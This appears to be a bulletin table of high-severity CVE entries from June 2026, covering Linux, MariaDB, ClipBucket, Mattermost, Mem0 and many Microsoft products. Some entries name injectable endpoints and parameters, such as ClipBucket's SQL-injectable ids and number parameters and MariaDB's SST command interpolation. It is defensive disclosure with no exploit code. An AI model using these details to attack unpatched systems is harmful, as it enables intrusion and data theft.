| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rockchip: rkcif: fix off by one bugs Change these comparisons from > vs >= to avoid accessing one element beyond the end of the arrays. While at it, use ARRAY_SIZE instead of the _MAX enum values. [fix cosmetic issues] | 2026-06-09 | 7.8 | CVE-2026-52907 |
| LiteSpeed Technologies--cPanel Plugin | LiteSpeed cPanel plugin before 2.4.8 (as distributed in LiteSpeed WHM PlugIn before 5.3.2.0) mishandles symlinks provided by a user with FTP or web shell access on a shared hosting server running CloudLinux/CageFS, as exploited in the wild in May 2026. | 2026-06-14 | 8.5 | CVE-2026-54420 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #140, ClipBucket's Remote Play feature allows any authenticated user to add a video by importing an external URL as the source. Some shell commands are run with the URL as a parameter. The URL is concatenated directly into shell commands without escaping then executed, so any shell metacharacter in the URL is interpreted. This results in arbitrary command execution. This issue has been patched in version 5.5.3 - #140. | 2026-06-11 | 9.8 | CVE-2026-42846 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #129, the actions/progress_video.php endpoint is vulnerable to blind SQL injection. Any unauthenticated user can exploit the ids parameter to execute SQL queries and exfiltrate sensitive data. This issue has been patched in version 5.5.3 - #129. | 2026-06-11 | 9.8 | CVE-2026-45060 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #132, any authenticated user who can upload videos can add multiple subtitles from different files and change their title (English, Spanish...). The POST /actions/subtitle_edit.php request used to change their title includes a number parameter which is vulnerable to SQL Injection. A boolean-based blind SQL injection can be used to exfiltrate sensitive data. This issue has been patched in version 5.5.3 - #132. | 2026-06-11 | 8.8 | CVE-2026-45418 |
| makeplane--plane | Plane is an open-source project management tool. Prior to version 1.3.1, there is a cross-workspace asset authorization bypass lets any authenticated user read, copy, delete, and overwrite assets in other Plane workspaces. This issue has been patched in version 1.3.1. | 2026-06-10 | 8.3 | CVE-2026-46558 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. Versions 10.6.1 through 10.6.26, 10.11.1 through 10.11.17, 11.4.1 through 11.4.11, 11.8.1 through 11.8.7, and 12.3.1 with `wsrep_notify_cmd` enabled would execute shell commands embedded in the name of the joiner node. This is fixed in 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2. As a workaround, anyone who cannot upgrade now should disable `wsrep_notify_cmd`. | 2026-06-11 | 10 | CVE-2026-49261 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, during the SST the donor node is interpolating parameters that the joiner sent into the command line. Not all parameters were properly validated which could allow a malicious joiner to execute arbitrary shell commands on the donor side via the mariabackup SST method. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2. | 2026-06-12 | 8 | CVE-2026-44168 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.27, 10.11.1 to before 10.11.18, 11.4.1 to before 11.4.12, 11.8.1 to before 11.8.8, and 12.3.1, during the SST the donor node is interpolating parameters that the joiner sent into the command line. Not all parameters were properly validated which could allow a malicious joiner to execute arbitrary shell commands on the donor side via the rsync SST method. This issue has been patched in versions 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2. | 2026-06-12 | 8 | CVE-2026-48163 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.27, 10.11.1 to before 10.11.18, 11.4.1 to before 11.4.12, 11.8.1 to before 11.8.8, and 12.3.1, a high-privileged MariaDB user could've used wsrep_sst_receive_address or wsrep_sst_donor global system variables to execute shell commands as the uid of the mariadbd process on the galera joiner node. This issue has been patched in versions 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2. | 2026-06-12 | 8 | CVE-2026-48165 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 Mattermost fails to require role-management authorization when setting the scheme_admin flag on group syncable link and patch endpoints, which allows a user with group-link permissions to escalate themselves and group members to team or channel admin via crafted API requests.. Mattermost Advisory ID: MMSA-2026-00665 | 2026-06-12 | 8.8 | CVE-2026-7387 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 Mattermost fails to sanitize FileInfo.Name received from federated peers during shared channel file sync, which allows an attacker who controls a federated server to write files to arbitrary locations within the target server's filestore via path traversal sequences in the filename field.. Mattermost Advisory ID: MMSA-2026-00661 | 2026-06-12 | 7.6 | CVE-2026-6961 |
| Md. Shamim Shahnewaz--Single Personal Message | Single Personal Message 1.0.3 contains an SQL injection vulnerability that allows authenticated users to execute arbitrary SQL queries by injecting malicious code through the message parameter. Attackers can access the admin interface and supply crafted SQL statements in the message parameter to extract sensitive database information including user credentials and site configuration data. | 2026-06-09 | 7.1 | CVE-2016-20063 |
| mem0ai--mem0 | Mem0 versions through 0.2.8, fixed in commit ae7f406, contain a missing authorization vulnerability in the self-hosted server component where the POST /configure endpoint modifies global LLM provider and embedder configuration but only verifies authentication via JWT or X-API-Key without validating the caller's role. Any authenticated user holding a distributed API key can redirect all LLM and embedder traffic to an attacker-controlled server, with the malicious configuration persisted to PostgreSQL and surviving server restarts to affect all users and API keys on the instance. | 2026-06-09 | 8.1 | CVE-2026-49948 |
| Microsoft--.NET 10.0 | Improper authorization in .NET allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45490 |
| Microsoft--.NET 10.0 | Uncontrolled resource consumption in ASP.NET Core allows an unauthorized attacker to deny service over a network. | 2026-06-09 | 7.5 | CVE-2026-45591 |
| Microsoft--Azure Kubernetes Service | Improper limitation of a pathname to a restricted directory ('path traversal') in Microsoft Azure Kubernetes Service allows an authorized attacker to execute code locally. | 2026-06-09 | 8.8 | CVE-2026-32193 |
| Microsoft--Azure Stack Edge | External control of file name or path in Azure Stack Edge allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 9.8 | CVE-2026-47643 |
| Microsoft--Azure Stack Edge | Improper neutralization of input during web page generation ('cross-site scripting') in Azure Stack Edge allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 8.4 | CVE-2026-41098 |
| Microsoft--Linux kernel - Microsoft MANA Network Driver | Use after free in Linux MANA Driver allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 8.2 | CVE-2026-45476 |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network. | 2026-06-09 | 8.2 | CVE-2026-44822 |
| Microsoft--Microsoft 365 Apps for Enterprise | Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45456 |
| Microsoft--Microsoft 365 Apps for Enterprise | Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45458 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45461 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45463 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45472 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45474 |
| Microsoft--Microsoft 365 Apps for Enterprise | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44817 |
| Microsoft--Microsoft 365 Apps for Enterprise | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7 | CVE-2026-44818 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44819 |
| Microsoft--Microsoft 365 Apps for Enterprise | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44820 |
| Microsoft--Microsoft 365 Apps for Enterprise | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44823 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44824 |
| Microsoft--Microsoft 365 Apps for Enterprise | Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45457 |
| Microsoft--Microsoft 365 Apps for Enterprise | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45469 |
| Microsoft--Microsoft 365 Apps for Enterprise | Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45471 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45475 |
| Microsoft--Microsoft 365 Apps for Enterprise | Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45486 |
| Microsoft--Microsoft 365 Apps for Enterprise | Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45643 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45645 |
| Microsoft--Microsoft 365 Apps for Enterprise | Use after free in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-47293 |
| Microsoft--Microsoft Dynamics 365 (on-premises) version 9.1 | Improper handling of insufficient permissions or privileges in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to elevate privileges over a network. | 2026-06-09 | 8.8 | CVE-2026-40371 |
| Microsoft--Microsoft Excel for Android | Integer overflow or wraparound in Windows Win32K - GRFX allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44803 |
| Microsoft--Microsoft Excel for Android | Integer overflow or wraparound in Windows Win32K - GRFX allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44812 |
| Microsoft--Microsoft Excel for Android | Improper access control in Office for Android allows an unauthorized attacker to perform spoofing locally. | 2026-06-09 | 7.1 | CVE-2026-45649 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to disclose information over a network. | 2026-06-09 | 8.1 | CVE-2026-45503 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network. | 2026-06-09 | 8.8 | CVE-2026-45504 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network. | 2026-06-09 | 8.1 | CVE-2026-47631 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Improper control of generation of code ('code injection') in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-45583 |
| Microsoft--Microsoft Live Share Canvas SDK | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Live Share Canvas SDK allows an authorized attacker to elevate privileges over a network. | 2026-06-09 | 8 | CVE-2026-45644 |
| Microsoft--Microsoft Office LTSC 2024 | Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-47635 |
| Microsoft--Microsoft PC Manager | Improper access control in Microsoft PC Manager allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.8 | CVE-2026-49161 |
| Microsoft--Microsoft PC Manager | Improper link resolution before file access ('link following') in Microsoft PC Manager allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-50511 |
| Microsoft--Microsoft PC Manager | Improper link resolution before file access ('link following') in Microsoft PC Manager allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-50512 |
| Microsoft--Microsoft PowerToys | Improper authorization in Microsoft PowerToys allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42902 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network. | 2026-06-09 | 8.8 | CVE-2026-45484 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-06-09 | 8 | CVE-2026-47298 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 7.3 | CVE-2026-45481 |
| Microsoft--Microsoft SharePoint Server 2019 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 7.3 | CVE-2026-47634 |
| Microsoft--Microsoft Teams for Android | Improper neutralization of special elements in output used by a downstream component ('injection') in Microsoft Teams for Android allows an authorized attacker to disclose information over a network. | 2026-06-09 | 8.1 | CVE-2026-42835 |
| Microsoft--Microsoft Visual Studio Code CoPilot Chat Extension | Improper limitation of a pathname to a restricted directory ('path traversal') in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to bypass a security feature locally. | 2026-06-09 | 8.4 | CVE-2026-45482 |
| Microsoft--Nuance PowerScribe 360 4.0 | Deserialization of untrusted data in Nuance PowerScribe allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 9.8 | CVE-2026-26142 |
| Microsoft--Remote Desktop client for Windows Desktop | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.8 | CVE-2026-42985 |
| Microsoft--Remote Desktop client for Windows Desktop | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-42909 |
| Microsoft--Remote Desktop client for Windows Desktop | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-42913 |
| Microsoft--Remote Desktop client for Windows Desktop | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-44799 |
| Microsoft--Remote Desktop client for Windows Desktop | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-44801 |
| Microsoft--Remote Desktop client for Windows Desktop | Out-of-bounds read in Windows RDP allows an unauthorized attacker to disclose information over a network. | 2026-06-09 | 7.5 | CVE-2026-45639 |
| Microsoft--Visual Studio Code | Improper input validation in Visual Studio Code allows an unauthorized attacker to elevate privileges over a network. | 2026-06-09 | 9.6 | CVE-2026-47281 |
| Microsoft--Visual Studio Code | Improper input validation in Visual Studio Code allows an unauthorized attacker to elevate privileges over a network. | 2026-06-09 | 7.5 | CVE-2026-40376 |
| Microsoft--Visual Studio Code | Improper input validation in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally. | 2026-06-09 | 7.1 | CVE-2026-48569 |
| Microsoft--Visual Studio Code - MSSQL Extension | Inclusion of functionality from untrusted control sphere in Visual Studio Code allows an unauthorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-47292 |
| Microsoft--Windows 10 Version 1607 | Stack-based buffer overflow in Windows DHCP Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 9.8 | CVE-2026-44815 |
| Microsoft--Windows 10 Version 1607 | No cwe for this issue in Windows DHCP Server allows an unauthorized attacker to perform tampering over a network. | 2026-06-09 | 9.1 | CVE-2026-45602 |
| Microsoft--Windows 10 Version 1607 | Integer overflow or wraparound in Windows HTTP.sys allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 9.8 | CVE-2026-47291 |
| Microsoft--Windows 10 Version 1607 | Use after free in Universal Plug and Play (upnp.dll) allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.1 | CVE-2026-45599 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Windows Hyper-V allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45607 |
| Microsoft--Windows 10 Version 1607 | Use after free in Universal Plug and Play (upnp.dll) allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.1 | CVE-2026-45635 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.8 | CVE-2026-47289 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.8 | CVE-2026-47653 |
| Microsoft--Windows 10 Version 1607 | Trust boundary violation in Windows Attestation allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-33828 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-34335 |
| Microsoft--Windows 10 Version 1607 | Windows Universal Disk Format File System Driver (UDFS) Elevation of Privilege Vulnerability | 2026-06-09 | 7.8 | CVE-2026-40404 |
| Microsoft--Windows 10 Version 1607 | Windows Universal Disk Format File System Driver (UDFS) Elevation of Privilege Vulnerability | 2026-06-09 | 7.8 | CVE-2026-40409 |
| Microsoft--Windows 10 Version 1607 | Improper access control in Microsoft Kinect allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-41092 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Microsoft Windows DNS allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-41108 |
| Microsoft--Windows 10 Version 1607 | Concurrent execution using shared resource with improper synchronization ('race condition') in Function Discovery Service (fdwsd.dll) allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-42836 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42905 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Windows RDP allows an unauthorized attacker to disclose information over a network. | 2026-06-09 | 7.5 | CVE-2026-42908 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-42911 |
| Microsoft--Windows 10 Version 1607 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Telephony Service allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-42912 |
| Microsoft--Windows 10 Version 1607 | Integer underflow (wrap or wraparound) in Windows NT OS Kernel allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42916 |
| Microsoft--Windows 10 Version 1607 | Integer underflow (wrap or wraparound) in Windows NT OS Kernel allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42980 |
| Microsoft--Windows 10 Version 1607 | Use after free in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42986 |
| Microsoft--Windows 10 Version 1607 | Improper link resolution before file access ('link following') in Winlogon allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42989 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-42992 |
| Microsoft--Windows 10 Version 1607 | Improper link resolution before file access ('link following') in Windows Collaborative Translation Framework allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45586 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-45588 |
| Microsoft--Windows 10 Version 1607 | Integer overflow or wraparound in Windows Internet (wininet.dll) allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45592 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45596 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45598 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45601 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45603 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45605 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45636 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45638 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45653 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows UEFI allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.8 | CVE-2026-45656 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack. | 2026-06-09 | 7.8 | CVE-2026-45658 |
| Microsoft--Windows 10 Version 1607 | Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-47648 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Boot Manager allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-47656 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48568 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48570 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48573 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Windows Media allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-48574 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48575 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48576 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48578 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-48583 |
| Microsoft--Windows 10 Version 1607 | Uncontrolled resource consumption in HTTP/2 allows an unauthorized attacker to deny service over a network. | 2026-06-09 | 7.5 | CVE-2026-49160 |
| Microsoft--Windows 10 Version 1809 | Buffer over-read in Windows Projected File System Filter Driver allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42828 |
| Microsoft--Windows 10 Version 1809 | Buffer over-read in Windows Projected File System Filter Driver allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42837 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42977 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42978 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42979 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42983 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-42984 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42991 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44802 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows SDK allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45593 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45637 |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-48563 |
| Microsoft--Windows 10 Version 21H2 | Heap-based buffer overflow in Windows TCP/IP allows an unauthorized attacker to elevate privileges over an adjacent network. | 2026-06-09 | 9.6 | CVE-2026-42904 |
| Microsoft--Windows 10 Version 21H2 | Out-of-bounds read in Windows Hyper-V allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45641 |
| Microsoft--Windows 10 Version 21H2 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-42993 |
| Microsoft--Windows 10 Version 21H2 | Time-of-check time-of-use (TOCTOU) race condition in Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45487 |
| Microsoft--Windows 10 Version 21H2 | Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45640 |
| Microsoft--Windows 11 version 23H2 | Use after free in Windows Kernel allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 9.8 | CVE-2026-45657 |
| Microsoft--Windows 11 version 23H2 | Integer underflow (wrap or wraparound) in Windows Performance Monitor allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.1 | CVE-2026-42974 |
| Microsoft--Windows 11 version 23H2 | Integer underflow (wrap or wraparound) in Windows Performance Monitor allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.1 | CVE-2026-42981 |
| Microsoft--Windows 11 version 23H2 | Improper authentication in Windows Cryptographic Services allows an unauthorized attacker to elevate privileges locally. | 2026-06-09 | 8.4 | CVE-2026-44810 |
| Microsoft--Windows 11 version 23H2 | Out-of-bounds read in Windows Hyper-V allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.2 | CVE-2026-47652 |
| Microsoft--Windows 11 version 23H2 | Concurrent execution using shared resource with improper synchronization ('race condition') in UI Automation Manager (uiamanager.dll) allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45597 |
| Microsoft--Windows 11 Version 24H2 | Improper access control in Windows Administrator Protection allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.8 | CVE-2026-42829 |
| Microsoft--Windows 11 Version 24H2 | Out-of-bounds write in Windows Hotpatch Monitoring Service allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42910 |
| Microsoft--Windows 11 Version 24H2 | Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44809 |
| Microsoft--Windows 11 Version 24H2 | Access of resource using incompatible type ('type confusion') in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45600 |
